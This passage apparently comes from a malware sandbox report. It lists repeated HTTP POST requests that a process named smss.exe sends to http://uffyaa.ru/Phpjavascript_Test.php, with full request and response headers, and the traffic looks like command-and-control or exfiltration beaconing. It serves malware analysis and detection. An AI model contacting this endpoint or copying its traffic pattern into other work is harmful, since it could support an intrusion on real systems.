                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dP6KJCAroaCd9n7x1l9lrmxHLF76BaR4N84qZNie5ZGOluwDGYAiZ8yEMIZUx1QU3Vqcxr3sCrh9iOrL3zr5Dlm%2B74UeyXpdnAZoVM8kg698DyZ2lUm6kYfII4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2313cd388a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58309&min_rtt=47954&rtt_var=4162&sent=58&recv=55&lost=0&retrans=0&sent_bytes=13776&recv_bytes=22988&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:56 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9V2hPTrwE9j14d%2BSN0Ecqoq%2B8rwSVBdfBfaDiwCGwdgz%2FyipfuGwVCTchB90xOjrs1%2F0W6tqLoAiuc3QsJPzMPvVyPPNDcY7ED3kYItypZGti9KFTpgEMduiSQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc238de2588a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=56425&min_rtt=47954&rtt_var=4370&sent=62&recv=59&lost=0&retrans=0&sent_bytes=14745&recv_bytes=24719&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:57 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ux%2Br4Im3Ug1f0KyUiQULh5kJP%2BHftRuutbcS1YPYCWetWkP8YnzjplATzcHwaN%2BJ1eZe67FgS6RxWnAyngI0g%2B%2FWUPVTwvbOzVYGarBc0CL1q5yKw%2FPJj%2B5dmU8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc240b96c88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55135&min_rtt=47954&rtt_var=4117&sent=66&recv=63&lost=0&retrans=0&sent_bytes=15720&recv_bytes=26450&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:58 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rr%2FFIU0NQ4NANquG6b3zvLWQ1dB%2FQUy8eHxpCYf4xPYFlSzcSp8ojoapyLyQI0%2BbG%2FSt4N5D5wLAbcXvHJOz%2FOoqyI3RPegR2l7AtePESIm3YhNt7rpK624QK0o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2485b9288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55323&min_rtt=47954&rtt_var=2861&sent=70&recv=67&lost=0&retrans=0&sent_bytes=16701&recv_bytes=28181&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:59 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f8NWFvtwtrP1J22lDJ6HmQm87VUp3jCsa5OvEEecfltV%2FAKtxmv9%2FSx7mxs7cU%2B7SBD9zyjyVnIk6mNMFpDKrfY%2FyBxgUUpK2hK0XI%2FIeFKKu9rfwBy8gmqe2QI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2500e1088a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54740&min_rtt=47954&rtt_var=2344&sent=74&recv=71&lost=0&retrans=0&sent_bytes=17678&recv_bytes=29912&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:01 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7Qbs8AkPCgUeeTwim72HiR8BtFVETncTtftyscRzdx5n8jKypfghlOJqBYlw9oiVx8GZUTfjkzolHtc0rWSAf2SpZEJQNucuRn3GSCLaBgMtR6p4Cwf%2FejiSdY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc257a87a88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55551&min_rtt=47954&rtt_var=2640&sent=78&recv=75&lost=0&retrans=0&sent_bytes=18655&recv_bytes=31643&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:02 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rVeAwXWGggwxruiipms5ua20YWCyy9ZuOgcMD07ahF%2FsH3PAKin8Lt%2Fak5E0Kk2knD%2Bz4tFvUwzxxr2SPI70%2Fp5RxhupknFHFJ27QTCpxTe5C3jY2fE96NwNVXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc25f5abf88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54340&min_rtt=47954&rtt_var=2776&sent=82&recv=79&lost=0&retrans=0&sent_bytes=19624&recv_bytes=33374&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:03 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KYMNbHZTHaIGfw3ORWM5kH%2Bp%2B4%2FUkFLb68FKVtEH%2B%2Fgiwp3JBGeeiLPB55WMdf7Abtvnboo5pVdrXJXglWHoaiZBH7AiMPgkbcdnYZvnpvjRrKm2AjAMAD5kHBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc266fdb788a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53999&min_rtt=47954&rtt_var=2196&sent=86&recv=83&lost=0&retrans=0&sent_bytes=20599&recv_bytes=35105&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBCjxAYp6nHAc3lVaZ98ocDX%2BIZ%2F6a9e2SsxyVGhBzEVwB%2BabLMjDPOMog5FRAHSSpHlFFVEg9N5bNEN6MtvksyWBFoIaqFTaThOrgWF08j9PMFjc1GOn9nnRVk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc26ea84988a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53954&min_rtt=47954&rtt_var=2632&sent=90&recv=87&lost=0&retrans=0&sent_bytes=21576&recv_bytes=36836&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:06 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ve4YLvNuWav3x6TTZ04k3fXNv2VjJzFHN67jUi8fQLsDXqQEMWIvY3XLqAfMS1HgrSpMPGIVClXOXEeNaknT4eGXhUKObRuf5HS8dSE87m0Zse8u6uthSm2R5cs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc276ab8b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53863&min_rtt=47954&rtt_var=1663&sent=94&recv=91&lost=0&retrans=0&sent_bytes=22549&recv_bytes=38567&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:07 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zjS2m0%2F0D3DscrLYmzYC9hIOTU8bitPCrfcFYQuwOdkxSZecDNi2IfQFep5DEA8%2FsGJYBzsyFid7pGawZhBWPpxSNcIPlcNG8SX8Sjt%2FABxaeoJg5f1GYt4BxLU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc27e490d88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54391&min_rtt=47954&rtt_var=2054&sent=98&recv=95&lost=0&retrans=0&sent_bytes=23516&recv_bytes=40298&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:08 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGaATxMQzNibd0JVGA9YeF8xsSPslbmc7Pbfijxji9hu3VAY%2B0hWsaLmRsXANyl6VNe8nulJvFLX2P3ngZbQVDZVXWFN9wKbd2feeTNEBMnxhx51msm8hoAG2WI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2860cfc88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53984&min_rtt=47954&rtt_var=1791&sent=102&recv=99&lost=0&retrans=0&sent_bytes=24489&recv_bytes=42029&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m7fWOs8H41PGOQLSbLjCa3CLjlgFAoPuhWy7A7DI7iCGYzfZD6poPkSksT4DwfmKykzyrmNxotK4j%2B3OPd347AutLE%2FJDG3hRT9ggVh7Yu2hi2weVWb9tcDKSzg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc28e38ca88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53686&min_rtt=47954&rtt_var=1981&sent=106&recv=103&lost=0&retrans=0&sent_bytes=25459&recv_bytes=43760&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1648
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:11 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JrossbsS8o3256zc4AkQFbP05G2HoQM4Q%2BwJF5c6950bKM80pJK2lJsKm1%2FCbk7Cwga79GTGKJDacqXfsElm%2B%2BbW48Qp6ApRvzq3hGeOvfDYkNFtlj2yBLIODs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2963cb188a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53446&min_rtt=47954&rtt_var=1543&sent=110&recv=107&lost=0&retrans=0&sent_bytes=26432&recv_bytes=45651&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1648
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:12 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HJZfG3llIti6l2LbHujhq8n%2ByaOzspVbBHKUFM5nGztyj1u%2FmdlpUoX%2BTm3JP6R3z0DgmGUYCq3H2jIocO2HmXeEU4%2BGnYEvisLQ3Bd97DBO2jifkmE6DnkGAc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc29def0588a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=53933&min_rtt=47954&rtt_var=1892&sent=114&recv=111&lost=0&retrans=0&sent_bytes=27409&recv_bytes=47542&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1648
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:13 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6G6%2F86sdy1evHNuzcIvi5Tn%2FW7S8RGI%2FUlgOrzJhtkZKHJrlu%2BhAVLAoREiNk1YbEC%2FuwTMg4HFxn4N%2B9G7pAtI0PCRFUVEhjLn4HB8l1S9p0upSCQStM8uT1w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2a59a3188a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=68864&min_rtt=47954&rtt_var=30170&sent=118&recv=115&lost=0&retrans=0&sent_bytes=28386&recv_bytes=49433&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:15 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WHgEkIv2aWg7GO7XAIPNncTxqyH8zW%2BcabXya5hhiURpkU%2FS2z6OGMPay9ZdpmIuMcMiw1W7fD2ibvdQmy2abysDLgu9r2brsqAcQVi6hqLOVlPPBYmlnztLT1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2aff83a88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=69218&min_rtt=47954&rtt_var=24784&sent=123&recv=119&lost=0&retrans=0&sent_bytes=29368&recv_bytes=51768&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
